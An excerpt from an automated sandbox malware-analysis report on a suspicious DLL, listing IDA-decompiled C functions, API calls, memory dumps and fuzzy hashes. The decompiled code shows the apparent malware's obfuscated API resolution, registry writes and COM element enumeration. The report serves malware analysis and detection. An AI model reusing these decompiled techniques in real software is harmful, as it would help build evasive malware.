                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 5c4c79af1e0ce5c9d48cad1a1eb4ea5726b5a02cc59d98dd4263819859cf2f12
                                • Instruction ID: df8201708c0e2006bc181ef11ff94360dde37da6653e423b8ad42eab6d269650
                                • Opcode Fuzzy Hash: 5c4c79af1e0ce5c9d48cad1a1eb4ea5726b5a02cc59d98dd4263819859cf2f12
                                • Instruction Fuzzy Hash: 5811707B9012257B47227FB49C89CAFB6ADDF897A03190515F504E7202DF74DD0297B1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4944A, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 00D494A4
                                • SysAllocString.OLEAUT32(0070006F), ref: 00D494B8
                                • SysAllocString.OLEAUT32(00000000), ref: 00D494CA
                                • SysFreeString.OLEAUT32(00000000), ref: 00D49532
                                • SysFreeString.OLEAUT32(00000000), ref: 00D49541
                                • SysFreeString.OLEAUT32(00000000), ref: 00D4954C
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 1fd6528f18204e2af97da5ad401bb9d9ea376bbbb7e4e5e1755e6b74c1d0a8de
                                • Instruction ID: d1b6e509bde65bbf83940695ad6c99662a09c4580a689b7794134e9e9c069685
                                • Opcode Fuzzy Hash: 1fd6528f18204e2af97da5ad401bb9d9ea376bbbb7e4e5e1755e6b74c1d0a8de
                                • Instruction Fuzzy Hash: 76414F36900609AFDB02DFBDD854AAFB7BAEF49310F144466F914EB220DA71DD05CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D44944, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D44944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00D41525(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xd4d2a8; // 0x253a5a8
					_t1 = _t23 + 0xd4e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xd4d2a8; // 0x253a5a8
					_t2 = _t26 + 0xd4e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00D48B22(_t54);
					} else {
						_t30 =  *0xd4d2a8; // 0x253a5a8
						_t5 = _t30 + 0xd4e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xd4d2a8; // 0x253a5a8
							_t7 = _t33 + 0xd4e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xd4d2a8; // 0x253a5a8
								_t9 = _t36 + 0xd4e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xd4d2a8; // 0x253a5a8
									_t11 = _t39 + 0xd4e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00D45CD1(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                0x00d44953
                                0x00d44957
                                0x00d44a19
                                0x00d4495d
                                0x00d4495d
                                0x00d44962
                                0x00d44975
                                0x00d44977
                                0x00d4497c
                                0x00d44984
                                0x00d4498b
                                0x00d4498d
                                0x00d44992
                                0x00d44a11
                                0x00d44a12
                                0x00d44994
                                0x00d44994
                                0x00d44999
                                0x00d449a1
                                0x00d449a3
                                0x00d449a8
                                0x00000000
                                0x00d449aa
                                0x00d449aa
                                0x00d449af
                                0x00d449b7
                                0x00d449b9
                                0x00d449be
                                0x00000000
                                0x00d449c0
                                0x00d449c0
                                0x00d449c5
                                0x00d449cd
                                0x00d449cf
                                0x00d449d4
                                0x00000000
                                0x00d449d6
                                0x00d449d6
                                0x00d449db
                                0x00d449e3
                                0x00d449e5
                                0x00d449ea
                                0x00000000
                                0x00d449ec
                                0x00d449f2
                                0x00d449f7
                                0x00d449fe
                                0x00d44a03
                                0x00d44a08
                                0x00000000
                                0x00d44a0a
                                0x00d44a0d
                                0x00d44a0d
                                0x00d44a08
                                0x00d449ea
                                0x00d449d4
                                0x00d449be
                                0x00d449a8
                                0x00d44992
                                0x00d44a27

                                APIs
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00D434A1,?,00000001,?,?,00000000,00000000), ref: 00D44969
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00D4498B
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00D449A1
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00D449B7
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00D449CD
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00D449E3
                                  • Part of subcall function 00D45CD1: memset.NTDLL ref: 00D45D50
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: a8723f899ba5a06790d04751bb918e3bc5321c57771f7d7fe86d606c986e0122
                                • Instruction ID: 9f8f1eb1cb332cc3657fb13d2c438f48294f0ba700667f995ecd6d0f70ec2627
                                • Opcode Fuzzy Hash: a8723f899ba5a06790d04751bb918e3bc5321c57771f7d7fe86d606c986e0122
                                • Instruction Fuzzy Hash: B92157B564070ABFD710EF69DC89E6AB7ECEF083087040466E905D7322EB70E9448B74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D44B2A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E00D44B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0xd4d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00D47B3B( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E00D48C52(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E00D48B22(_a8);
						goto L29;
					}
					_t64 =  *0xd4d278; // 0x3289d18
					_t16 = _t64 + 0xc; // 0x3289e3a
					_t65 = E00D47B3B(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00d4c0
						if(E00D4A38F(_t97,  *_t33, _t91, _a8,  *0xd4d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0xd4d2a8; // 0x253a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0xd4ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0xd4e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E00D48F85(_t69,  *0xd4d334,  *0xd4d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xd4d2a8; // 0x253a5a8
									_t44 = _t71 + 0xd4e846; // 0x74666f53
									_t73 = E00D47B3B(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00d4c0
										E00D44538( *_t47, _t91, _a8,  *0xd4d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d00d4c0
										E00D44538( *_t49, _t91, _t99,  *0xd4d330, _a16);
										E00D48B22(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00d4c0
									E00D44538( *_t40, _t91, _a8,  *0xd4d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d00d4c0
									E00D44538( *_t43, _t91, _a8,  *0xd4d330, _a16);
								}
								if( *_t101 != 0) {
									E00D48B22(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00d4c0
					_t81 = E00D47DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00d4c0
							E00D4A38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00D48B22(_t100);
						_t98 = _a16;
					}
					E00D48B22(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00D4A789(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xd4d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                0x00d44b2a
                                0x00d44b33
                                0x00d44b3a
                                0x00d44b3f
                                0x00d44bac
                                0x00d44bb2
                                0x00d44bb7
                                0x00d44bbe
                                0x00d44bc3
                                0x00d44bc8
                                0x00d44d33
                                0x00d44d3a
                                0x00d44d3a
                                0x00d44d3f
                                0x00d44d41
                                0x00d44d41
                                0x00d44d4a
                                0x00d44d4a
                                0x00d44bce
                                0x00d44bda
                                0x00d44d29
                                0x00d44d2c
                                0x00000000
                                0x00d44d2c
                                0x00d44be0
                                0x00d44be5
                                0x00d44be8
                                0x00d44bed
                                0x00d44bf2
                                0x00d44c3b
                                0x00d44c3b
                                0x00d44c4e
                                0x00d44c58
                                0x00d44c5e
                                0x00d44c65
                                0x00d44c6f
                                0x00d44c6f
                                0x00d44c67
                                0x00d44c67
                                0x00d44c67
                                0x00d44c67
                                0x00d44c91
                                0x00d44c99
                                0x00d44cc7
                                0x00d44ccc
                                0x00d44cd3
                                0x00d44cd8
                                0x00d44cdc
                                0x00d44d0e
                                0x00d44cde
                                0x00d44ceb
                                0x00d44cee
                                0x00d44cfe
                                0x00d44d01
                                0x00d44d07
                                0x00d44d07
                                0x00d44c9b
                                0x00d44ca8
                                0x00d44cab
                                0x00d44cbd
                                0x00d44cc0
                                0x00d44cc0
                                0x00d44d18
                                0x00d44d24
                                0x00d44d1a
                                0x00d44d1d
                                0x00d44d1d
                                0x00d44d18
                                0x00d44c91
                                0x00000000
                                0x00d44c58
                                0x00d44c01
                                0x00d44c04
                                0x00d44c0b
                                0x00d44c11
                                0x00d44c14
                                0x00d44c16
                                0x00d44c22
                                0x00d44c25
                                0x00d44c25
                                0x00d44c2b
                                0x00d44c30
                                0x00d44c30
                                0x00d44c36
                                0x00000000
                                0x00d44c36
                                0x00d44b44
                                0x00000000
                                0x00d44b6b
                                0x00d44b6b
                                0x00d44b77
                                0x00d44b8a
                                0x00d44b90
                                0x00d44b98
                                0x00000000
                                0x00d44b98

                                APIs
                                • StrChrA.SHLWAPI(00D49900,0000005F,00000000,00000000,00000104), ref: 00D44B5D
                                • lstrcpy.KERNEL32(?,?), ref: 00D44B8A
                                  • Part of subcall function 00D47B3B: lstrlen.KERNEL32(?,00000000,03289D18,00000000,00D45142,03289F3B,?,?,?,?,?,69B25F44,00000005,00D4D00C), ref: 00D47B42
                                  • Part of subcall function 00D47B3B: mbstowcs.NTDLL ref: 00D47B6B
                                  • Part of subcall function 00D47B3B: memset.NTDLL ref: 00D47B7D
                                  • Part of subcall function 00D44538: lstrlenW.KERNEL32(?,?,?,00D44CF3,3D00D4C0,80000002,00D49900,00D45C8D,74666F53,4D4C4B48,00D45C8D,?,3D00D4C0,80000002,00D49900,?), ref: 00D4455D
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                • lstrcpy.KERNEL32(?,00000000), ref: 00D44BAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: f291ea69175df2ef490caca9a69d57ab25486ca40121a13104c6688ed79fa5a5
                                • Instruction ID: b6052a13d68ad10405d61d816d8f772e8155218896cbec273edaf6467edef825
                                • Opcode Fuzzy Hash: f291ea69175df2ef490caca9a69d57ab25486ca40121a13104c6688ed79fa5a5
                                • Instruction Fuzzy Hash: E3516C7550020AFFDF21AFA0DD84EAA7BBAFF08300F148554F95196261DB31D9A5AB31
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D49FF6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00D49FF6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xd4d32c; // 0x32895b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xd4d32c; // 0x32895b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xd4d32c; // 0x32895b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xd4e81a) {
					HeapFree( *0xd4d238, 0, _t10);
					_t7 =  *0xd4d32c; // 0x32895b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                0x00d49ff6
                                0x00d49fff
                                0x00d4a00f
                                0x00d4a00f
                                0x00d4a014
                                0x00d4a019
                                0x00000000
                                0x00000000
                                0x00d4a009
                                0x00d4a009
                                0x00d4a01b
                                0x00d4a020
                                0x00d4a024
                                0x00d4a037
                                0x00d4a03d
                                0x00d4a03d
                                0x00d4a046
                                0x00d4a048
                                0x00d4a04c
                                0x00d4a052

                                APIs
                                • RtlEnterCriticalSection.NTDLL(03289570), ref: 00D49FFF
                                • Sleep.KERNEL32(0000000A,?,00D430F3), ref: 00D4A009
                                • HeapFree.KERNEL32(00000000,?,?,00D430F3), ref: 00D4A037
                                • RtlLeaveCriticalSection.NTDLL(03289570), ref: 00D4A04C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: 7baeea32a4b907d9de5f14455bbd82a39cdfed8c8b07a691cb8f6d3383e7f87c
                                • Instruction ID: 94c705f0c744e4160e1c1b3ee5d081b28f586a4a1424a9651ee7bdfb88928394
                                • Opcode Fuzzy Hash: 7baeea32a4b907d9de5f14455bbd82a39cdfed8c8b07a691cb8f6d3383e7f87c
                                • Instruction Fuzzy Hash: E4F0D47C641301DBE7288F68EC89F2577E6AB0A741B089018E902DB378C634EC00DA36
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D49EBB, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D49EBB(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xd4d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xd4d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0xd4d258 = _t6;
					 *0xd4d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xd4d254 = _t7;
					if(_t7 == 0) {
						 *0xd4d254 =  *0xd4d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                0x00d49ec3
                                0x00d49ec9
                                0x00d49ed0
                                0x00000000
                                0x00d49f2a
                                0x00d49ed2
                                0x00d49eda
                                0x00d49ee7
                                0x00d49ee7
                                0x00d49f27
                                0x00000000
                                0x00d49f27
                                0x00d49ee9
                                0x00d49ee9
                                0x00d49eee
                                0x00d49f00
                                0x00d49f05
                                0x00d49f0b
                                0x00d49f11
                                0x00d49f18
                                0x00d49f1a
                                0x00d49f1a
                                0x00000000
                                0x00d49f21
                                0x00d49ee3
                                0x00000000
                                0x00000000
                                0x00d49ee5
                                0x00000000

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00D427C3,?,?,00000001,?,?,?,00D47F25,?), ref: 00D49EC3
                                • GetVersion.KERNEL32(?,00000001,?,?,?,00D47F25,?), ref: 00D49ED2
                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00D47F25,?), ref: 00D49EEE
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00D47F25,?), ref: 00D49F0B
                                • GetLastError.KERNEL32(?,00000001,?,?,?,00D47F25,?), ref: 00D49F2A
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 6b26320e4ab751bd486800b66579e597f31539679f13ace6ec7a61d8eca8135e
                                • Instruction ID: 7a1d0402df681c1ea92cfe1f905111eb295316a5a68b5474aad864ae93bc5621
                                • Opcode Fuzzy Hash: 6b26320e4ab751bd486800b66579e597f31539679f13ace6ec7a61d8eca8135e
                                • Instruction Fuzzy Hash: 25F0F678662302DBD720CF75AC79B16BBA2AB82705F14051AFA42C63E0E7B1C405CB3D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D44E05, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E00D44E05(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0xd4d2a8; // 0x253a5a8
					_t5 = _t103 + 0xd4e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0xd4c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0xd4d2a8; // 0x253a5a8
												_t28 = _t109 + 0xd4e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0xd4d2a8; // 0x253a5a8
														_t33 = _t79 + 0xd4e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                0x00d44e0a
                                0x00d44e13
                                0x00d44e14
                                0x00d44e18
                                0x00d44e1e
                                0x00d44e24
                                0x00d44e2d
                                0x00d44e33
                                0x00d44e3d
                                0x00d44e3f
                                0x00d44e45
                                0x00d44e4a
                                0x00d44e55
                                0x00d44e5b
                                0x00d44e60
                                0x00d44f82
                                0x00d44e66
                                0x00d44e66
                                0x00d44e73
                                0x00d44e79
                                0x00d44e7f
                                0x00d44e83
                                0x00d44e89
                                0x00d44e96
                                0x00d44e9a
                                0x00d44ea0
                                0x00d44ea3
                                0x00d44eab
                                0x00d44eac
                                0x00d44eb0
                                0x00d44eb4
                                0x00d44eb7
                                0x00d44eba
                                0x00d44ec0
                                0x00d44ec9
                                0x00d44ecf
                                0x00d44ed0
                                0x00d44ed3
                                0x00d44ed4
                                0x00d44ed5
                                0x00d44edd
                                0x00d44ede
                                0x00d44edf
                                0x00d44ee1
                                0x00d44ee5
                                0x00d44ee9
                                0x00000000
                                0x00000000
                                0x00d44eef
                                0x00d44ef8
                                0x00d44efe
                                0x00d44f08
                                0x00d44f0c
                                0x00d44f0e
                                0x00d44f1b
                                0x00d44f1f
                                0x00d44f27
                                0x00d44f2c
                                0x00d44f3e
                                0x00d44f40
                                0x00d44f46
                                0x00d44f46
                                0x00d44f4f
                                0x00d44f4f
                                0x00d44f51
                                0x00d44f57
                                0x00d44f57
                                0x00d44f5a
                                0x00d44f60
                                0x00d44f63
                                0x00d44f6c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d44f6c
                                0x00d44ec0
                                0x00d44eba
                                0x00d44ea3
                                0x00d44f72
                                0x00d44f72
                                0x00d44f78
                                0x00d44f78
                                0x00d44f7e
                                0x00d44f7e
                                0x00d44f87
                                0x00d44f8d
                                0x00d44f8d
                                0x00d44e4a
                                0x00d44f96

                                APIs
                                • SysAllocString.OLEAUT32(00D4C290), ref: 00D44E55
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00D44F36
                                • SysFreeString.OLEAUT32(00000000), ref: 00D44F4F
                                • SysFreeString.OLEAUT32(?), ref: 00D44F7E
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 5e66d762be028d131f707df8891d60b1302a7b59dfbfb1034a9339ce83155537
                                • Instruction ID: 5d71aa805b440ed3cce8eb5ccab79d9a8d7fb641ac4bbc2bd43016ce40be0c1a
                                • Opcode Fuzzy Hash: 5e66d762be028d131f707df8891d60b1302a7b59dfbfb1034a9339ce83155537
                                • Instruction Fuzzy Hash: E7511975D00619EFCB00DFA8C8889AEF7BAEF89704B148594E915EB324D771AD45CBB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4137B, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 00D413B6
                                • SysFreeString.OLEAUT32(00000000), ref: 00D4149B
                                  • Part of subcall function 00D44E05: SysAllocString.OLEAUT32(00D4C290), ref: 00D44E55
                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 00D414EE
